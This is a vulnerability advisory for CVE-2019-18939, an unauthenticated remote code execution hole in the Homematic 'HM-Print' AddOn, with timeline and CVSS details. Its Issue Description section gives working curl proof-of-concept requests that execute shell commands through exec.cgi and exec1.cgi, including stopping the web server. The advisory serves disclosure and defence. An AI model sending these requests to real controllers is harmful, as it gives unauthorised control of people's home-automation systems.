CVE-2019-18939 eQ-3 Homematic AddOn 'HM-Print' version 1.2a and prior on CCU2 and CCU3 allows Remote Code Execution by unauthenticated attackers with access to the web interface by usage of exec.cgi & exec1.cgi script, which executes TCL script content from HTTP POST request
Overview
- CVE: CVE-2019-18939
- Author: psytester
- Title: eQ-3 Homematic AddOn ‘HM-Print’ version 1.2a and prior on CCU2 and CCU3 allows Remote Code Execution by unauthenticated attackers with access to the web interface by usage of exec.cgi & exec1.cgi script, which executes TCL script content from HTTP POST request
- Vulnerability Type: CWE-284: Improper Access Control
- CVSSv3 Base Score: 10.0
- CVSSv3 Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
- Publishing Date: 14.11.2019
- Updated: 05.11.2020
- Vendor: eQ-3 AG for CCU Firmware is providing possibility to install AddOn software
- Product: Homematic CCU2 and CCU3
- Vendor eQ-3 contacted: 13.02.2019
- Vendor eQ-3 response on 11.04.2019 with “not responsible for AddOns”
- Addon itself:
- Developer of ‘HM-Print’ AddOn contacted: 13.08.2019 as issue #4
- Developer of ‘HM-Print’ AddOn confirmation: N.A.
- ‘HM-Print’ AddOn patch: Version 2.3 released on 03.11.2020
- Affected ‘HM-Print’ AddOn version: 2.2, 2.1, 1.2a and prior
Background
From Github ‘HM-Print’ AddOn project page:
For documentation purposes it would sometimes be desirable to be able to print programs within the WebUI. Unfortunately, the interface does not offer a corresponding function. Also the built-in print function of the browser does not help, because scripts may remain unaffected by the printout. With this small AddOn this functionality can be easily retrofitted.
From eQ-3 vendor’s website for CCU2:
HomeMatic Central Control Unit CCU2
Homematic Central Control Unit is the central element of your Homematic system, offering a whole range of control, monitoring and configuration options for all the Homematic devices in your installation
[….]
From eQ-3 vendor’s website for CCU3:
The Central Control Unit CCU3 is the central element for local control of the Homematic IP smart home system. It represents the next generation of our proven Homematic Central Control Units CCU1 and CCU2. Operation via the Central Control Unit CCU3 can be used alternatively to the Homematic IP Access Point. While the Access Point establishes the connection to the free Homematic IP cloud and enables operation of the smart home system via a smartphone app, the Central Control Unit CCU3 works locally via a browser-based web interface (WebUI). Thanks to local configuration and operation as well as the option to create direct device connections, reliable and fail-proof operation of the smart home system is guaranteed at all times – even in the event of Internet failures.
[….]
Issue Description
While analyzing the CCU web interface based on given page files in file system path /www, this is another Improper Access Control resulting into Remote Code Execution vulnerability located in ‘HM-Print’ AddOn, if it’s installed. This vulnerability can be exploited by unauthenticated attackers with access to the web interface.
The following HTTP requests in Web Browser illustrates the attack vectors:
- RCE with Homematic undocumented internal system.Exec() call on exec.cgi or exec1.cgi:
curl -X POST -i 'http://1.2.3.4/addons/print/exec.cgi' --data 'var x=system.Exec("sleep 4;");'
curl -X POST -i 'http://1.2.3.4/addons/print/exec.cgi' --data 'var x=system.Exec("/bin/touch /tmp/testfile;");'
curl -X POST -i 'http://1.2.3.4/addons/print/exec.cgi' --data 'var x=system.Exec("/etc/init.d/S50lighttpd stop;");'
curl -X POST -i 'http://1.2.3.4/addons/print/exec1.cgi' --data 'var x=system.Exec("sleep 4;");'
curl -X POST -i 'http://1.2.3.4/addons/print/exec1.cgi' --data 'var x=system.Exec("/bin/touch /tmp/testfile;");'
curl -X POST -i 'http://1.2.3.4/addons/print/exec1.cgi' --data 'var x=system.Exec("/etc/init.d/S50lighttpd stop;");'
- If also the popular CUxD AddOn is installed, another RCE is possible by abuse of the virtual CUxD’CMD_EXEC’ device call on exec.cgi or exec1.cgi:
curl -X POST -i 'http://1.2.3.4/addons/print/exec.cgi' --data 'var x=dom.GetObject("CUxD.CUX2801001:1.CMD_EXEC").State("/bin/touch /tmp/testfile");'
curl -X POST -i 'http://1.2.3.4/addons/print/exec.cgi' --data 'var x=dom.GetObject("CUxD.CUX2801001:1.CMD_EXEC").State("/etc/init.d/S50lighttpd stop");'
curl -X POST -i 'http://1.2.3.4/addons/print/exec1.cgi' --data 'var x=dom.GetObject("CUxD.CUX2801001:1.CMD_EXEC").State("/bin/touch /tmp/testfile");'
curl -X POST -i 'http://1.2.3.4/addons/print/exec1.cgi' --data 'var x=dom.GetObject("CUxD.CUX2801001:1.CMD_EXEC").State("/etc/init.d/S50lighttpd stop");'
CVE
CVSSv3 Base Score
CVSSv3 Base Score: 10.0
CVSSv3 Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
Credit
Not owning an original CCU2 or CCU3, but you want to analyze the CCU ‘for free’?
You can download
piVCCU for running the original CCU3 Firmware in lxc container on RaspberryPi
RaspberryMatic for running the opensource OCCU based release on different boards
Disclaimer
The information provided is released “as is” without warranty of any kind. The publisher disclaims all warranties, either express or implied, including all warranties of merchantability. No responsibility is taken for the correctness of this information. In no event shall the publisher be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if the publisher has been advised of the possibility of such damages.
The contents of this advisory are copyright (c) 2019 by psytester and may be distributed freely provided that no fee is charged for this distribution and proper credit is given.